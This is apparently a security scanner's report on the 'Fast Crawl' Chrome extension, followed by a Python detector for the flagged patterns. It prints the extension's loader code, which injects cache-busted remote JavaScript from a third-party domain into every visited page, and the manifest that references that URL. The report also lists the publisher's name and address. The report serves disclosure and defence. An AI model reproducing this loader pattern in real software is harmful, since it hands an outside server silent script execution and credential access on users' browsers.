Security Alert: Critical Security Risk
Fast Crawl
ID: jlbghamedkepgojmklfldebnomajbmhf
Extension Info & Metadata
Publisher Contextual Analysis
- Author: Michael
- Privacy: Privacy Policy
- Country: FI
- MX records exist: Yes
- Domain exists: Yes
- Is disposable: No
- Is role-based: No
- Mailbox exists: Yes
- Address: Pääskyntie 23 Alavieska 85200 FI
- Website: (link on listing)
Quickly crawl pages using the client as the endpoint, and parse out the data you want according to your development needs.
A plugin that quickly crawls Amazon product details using the client as the endpoint; developers integrate and use this feature through secondary development.
Every page the user visits triggers injection of a remotely-hosted script from `api-pdd.kjsd.club`, a domain unrelated to the publisher. The `?t=<timestamp>` parameter busts the cache so fresh code is fetched on every page load, meaning the server operator can silently push arbitrary JavaScript onto all visited pages at any time. This grants the script full DOM access, network access, and the ability to steal credentials, capture form inputs, or exfiltrate page content without any further extension update.
```javascript
// inject js
function FastCrawlInjectJs(jsUrl) {
  if (!jsUrl) return;
  var temp = FastCrawlCreateElement('script', {
    type: 'text/javascript',
    src: jsUrl,
    defer: true,
    onload: function() { this.parentNode.removeChild(this); }
  });
  FastCrawlAppendElement('head', temp);
}
FastCrawlInjectJs('https://api-pdd.kjsd.club/static/js/fast-crawl-helper.js?t=' + (new Date()).getTime())
```

The content script unconditionally calls `injectCustomJs()` on every page load (across all URLs matched by `http://*/*` and `https://*/*`), which then loads `inject.js`, which in turn loads the remote third-party script. The attack surface is every page the user browses, not just specific targets.
```javascript
// wait for the current page's DOM to finish loading
document.addEventListener('DOMContentLoaded', function() {
  // start the injection
  injectCustomJs();
  // listen for messages from the background page
  chrome.runtime.onMessage.addListener(function(packages, sender, sendResponse) {
    // (remainder of the listener not included in the report excerpt)
  });
});
```

The bundled manifest is MV2 and declares no permissions, while the published CWS listing shows MV3 with `storage` and `tabs` permissions. The bundled `web_accessible_resources` also directly references the external third-party URL (`api-pdd.kjsd.club`), which is abnormal and confirms the remote injection is intentional. This manifest discrepancy between the installed binary and the CWS listing is itself a strong indicator of deceptive submission practices.
```json
{
  "manifest_version": 2,
  "permissions": [],
  "web_accessible_resources": [
    "/js/inject.js",
    "https://api-pdd.kjsd.club/static/js/fast-crawl-helper.js"
  ]
}
```
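As an added defensive example (not part of this report or the extension's own code), the check below flags the three patterns described above when run over a package: a remote URL listed in `web_accessible_resources`, a script URL pointing at a host the publisher does not control, a cache-busting timestamp appended to that URL, and a bundled manifest that disagrees with the store listing. The inputs are reduced from the excerpts quoted here; the publisher host set is a placeholder assumption, since the report names no publisher domain.

```python
import json
import re
from urllib.parse import urlparse

# Constructed inputs, reduced from the excerpts quoted in this report.
BUNDLED_MANIFEST = json.loads("""{
  "manifest_version": 2, "permissions": [],
  "web_accessible_resources": ["/js/inject.js",
    "https://api-pdd.kjsd.club/static/js/fast-crawl-helper.js"]
}""")
LISTING_MANIFEST = {"manifest_version": 3, "permissions": ["storage", "tabs"]}
INJECT_JS = ("FastCrawlInjectJs('https://api-pdd.kjsd.club/static/js/"
             "fast-crawl-helper.js?t=' + (new Date()).getTime())")
# Hosts the publisher controls (placeholder assumption; the report names none).
PUBLISHER_HOSTS = {"publisher.invalid"}

URL_RE = re.compile(r"""https?://[^\s'"]+""")
# '?t=' + (new Date()) or Date.now(): a timestamp glued onto a script URL.
CACHE_BUST_RE = re.compile(r"""\?t=['"]\s*\+\s*(?:\(new Date\(\)\)|Date\.now\(\))""")

def remote_web_accessible(manifest):
    """web_accessible_resources should be bundled paths, never remote URLs."""
    return [r for r in manifest.get("web_accessible_resources", []) if URL_RE.match(r)]

def foreign_urls(js_text, publisher_hosts):
    """URLs in the script whose host is not one the publisher controls."""
    return [u for u in URL_RE.findall(js_text)
            if urlparse(u).hostname not in publisher_hosts]

def has_cache_buster(js_text):
    """True when a script URL carries a per-load timestamp parameter."""
    return CACHE_BUST_RE.search(js_text) is not None

def manifest_mismatch(bundled, listing):
    """Keys where the installed package disagrees with the store listing."""
    return sorted(k for k in listing if bundled.get(k) != listing[k])

def analyse(bundled, listing, js_text, publisher_hosts=PUBLISHER_HOSTS):
    """Collect the findings that together justify a critical rating."""
    findings = {}
    if remote_web_accessible(bundled):
        findings["remote_web_accessible_resource"] = remote_web_accessible(bundled)
    if foreign_urls(js_text, publisher_hosts):
        findings["foreign_script_host"] = foreign_urls(js_text, publisher_hosts)
    if has_cache_buster(js_text):
        findings["cache_busting_remote_code"] = True
    if manifest_mismatch(bundled, listing):
        findings["manifest_mismatch"] = manifest_mismatch(bundled, listing)
    return findings

if __name__ == "__main__":
    print(json.dumps(analyse(BUNDLED_MANIFEST, LISTING_MANIFEST, INJECT_JS), indent=2))
```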
Versions scanned
Showing 1 of 15 scanned versions with more than one unique finding. Counts are unique findings that include each version.
| Extension Version | Code Review Findings |
|---|---|
| 1.0.0 | 3 |
Files with findings
3 distinct paths — top paths by unique finding count:
- js/content-script.js (1)
- js/inject.js (1)
- manifest.json (1)
Code Diff
No comparable text files found between these versions.
